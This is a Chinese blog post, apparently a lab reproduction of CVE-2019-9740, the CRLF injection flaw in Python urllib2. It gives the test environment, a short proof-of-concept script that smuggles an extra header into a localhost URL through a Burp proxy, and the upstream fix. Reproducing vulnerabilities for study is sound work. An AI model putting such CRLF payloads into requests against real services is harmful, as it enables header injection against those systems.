欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

(环境搭建+复现)CVE-2019-9740 Python urllib CRLF 注入

程序员文章站 2022-03-24 15:24:36
...

【CNVD编号】

CVE-2019-9740

【漏洞名称】

Python urllib CRLF 命令注入漏洞

1【靶标分类】

通用漏洞组件

2【漏洞分类】

命令注入

3【漏洞等级】

4【漏洞简介】

Python是Python软件基金会的一套开源的、面向对象的程序设计语言。该语言具有可扩展、支持模块和包、支持多种平台等特点。urllib是其中的一个用于处理URL的模块。urllib2是其中的一个用于获取URL(统一资源定位符)的模块。

Python 2.x版本至2.7.16版本中的urllib2和Python 3.x版本至3.7.2版本中的urllib存在注入漏洞。该漏洞源于用户输入构造命令、数据结构或记录的操作过程中,网络系统或产品缺乏对用户输入数据的正确验证,未过滤或未正确过滤掉其中的特殊元素,导致系统或产品产生解析或解释方式错误。

0x01【靶标运行环境】

操作系统:win7专业版

中间件版本:Apache 2.4.23(win32)

编程语言版本:PHP 5.4.45

数据库版本:MySQL 5.5.53

Python版本:2.7.15

工具:burpsuite,phpstudy

 

【靶标利用过程】

工具:burpsuite,phpstudy

  1. 编写poc文件1.py,验证漏洞存在
  2. # The proxy address and port:
    import urllib2
    proxy_info = { 'host' : '127.0.0.1',
                   'port' : 8080
                 }
    
    # We create a handler for the proxy
    proxy_support = urllib2.ProxyHandler({"http" : "http://%(host)s:%(port)d" % proxy_info})
    
    # We create an opener which uses this handler:
    opener = urllib2.build_opener(proxy_support)
    
    # Then we install this opener as the default opener for urllib2:
    urllib2.install_opener(opener)
    
    # Now we can send our HTTP request:
    url = "http://127.0.0.1?a=1 HTTP/1.1\r\nCRLF-injection: test\r\nTEST: 123:8080/test/?test=a"
    htmlpage = urllib2.urlopen(url).read()
    print htmlpage
    
    

 

3、运行poc,这里我们使用urllib2的代理服务到burp上,让我们比较明显的看到漏洞的发生。

(环境搭建+复现)CVE-2019-9740 Python urllib CRLF 注入

 

 

  1. 【解决方案】

官方解决方案

https://github.githistory.xyz/python/cpython/blob/96aeaec64738b730c719562125070a52ed570210/Lib/http/client.py

在putrequest方法上对url进行检查,匹配所有的ascii码在00到32的所有字符,并且同时匹配\x7f字符防止CRLF漏洞的发生。

(环境搭建+复现)CVE-2019-9740 Python urllib CRLF 注入

Referer:

http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201903-484

https://xz.aliyun.com/t/5123

相关标签: 漏洞复现